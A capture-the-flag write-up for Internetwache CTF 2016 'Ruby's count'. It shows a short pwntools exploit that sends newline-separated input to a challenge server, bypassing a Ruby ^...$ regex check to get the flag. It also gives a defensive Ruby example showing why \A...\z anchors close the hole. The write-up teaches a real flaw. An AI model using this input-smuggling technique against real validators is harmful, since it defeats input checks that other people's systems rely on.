The force is with those who read the source.

Internetwache CTF 2016: Ruby's count (exp 50)

2016-03-04

Description

Hi, my name is Ruby. I like converting characters into ascii values and then calculating the sum.

Exploit

Let me count the ascii values of 10 characters:
abcdefghij
WRONG!!!! Only 10 characters matching /^[a-f]{10}$/ !

So now we know the regular expression the input has to match. However, we can’t reach the target score by inputting only 10 [a-f] characters.

Let me count the ascii values of 10 characters:
ffffffffff
Sum is: 1020
That's not enough (1020 < 1020)

To input more characters, I make use of the feature of Ruby’s regular expressions described in this post.

^ for start-of-string and $ for end-of-string ARE just new lines - \n!

Using the following pattern, we can make the sum more than 1020 and get the flag.

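exp.py

from pwnlib.tubes.remote import remote

# Connect to the challenge service
r = remote('188.166.133.53', 12037)
# Two lines of ten [a-f] characters: ^ and $ match around a single line,
# so the input is accepted even though it is longer than ten characters
r.send(b'aaaaaaaaaa\naaaaaaaaaa\n')
print(r.recvall().decode())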

Flag: IW{RUBY_R3G3X_F41L}
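
The root cause is that `^` and `$` in Ruby are line anchors, while `\A` and `\z` anchor the whole string. The following is an added example, not the challenge's source code: it assumes the service validates the raw input with the printed pattern and then requires the byte sum to be strictly greater than 1020, and compares that pattern with two string-anchored forms on constructed inputs.

```ruby
# Added example: a hypothetical reconstruction of the check, not the challenge's source.
LINE_ANCHORED   = /^[a-f]{10}$/     # pattern the service printed; ^ and $ are per-line
END_BEFORE_NL   = /\A[a-f]{10}\Z/   # \Z still tolerates one trailing "\n"
STRING_ANCHORED = /\A[a-f]{10}\z/   # hardened: whole string, nothing after

TARGET = 1020 # threshold taken from the service output (assumed strict ">")

# Sum of the byte values of everything that was submitted, newlines included.
def ascii_sum(input)
  input.bytes.sum
end

# Validate with the given pattern, then apply the threshold check.
def verdict(input, pattern)
  return :rejected unless pattern.match?(input)
  ascii_sum(input) > TARGET ? :enough : :not_enough
end

# Constructed inputs: the two strings from the write-up plus a trailing-newline case.
SAMPLES = [
  "ffffffffff",
  "ffffffffff\n",
  "aaaaaaaaaa\naaaaaaaaaa\n",
].freeze

PATTERNS = {
  '^...$'   => LINE_ANCHORED,
  '\A...\Z' => END_BEFORE_NL,
  '\A...\z' => STRING_ANCHORED,
}.freeze

# One line per sample: its byte sum and the verdict under each pattern.
def report
  SAMPLES.map do |s|
    row = PATTERNS.map { |name, re| "#{name}=#{verdict(s, re)}" }.join("  ")
    format("%-28s sum=%-5d %s", s.inspect, ascii_sum(s), row)
  end
end

puts report if __FILE__ == $PROGRAM_NAME
```

Only the `\A...\z` form limits the input to exactly ten characters; `\A...\Z` still accepts a trailing newline, which is counted in the sum.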

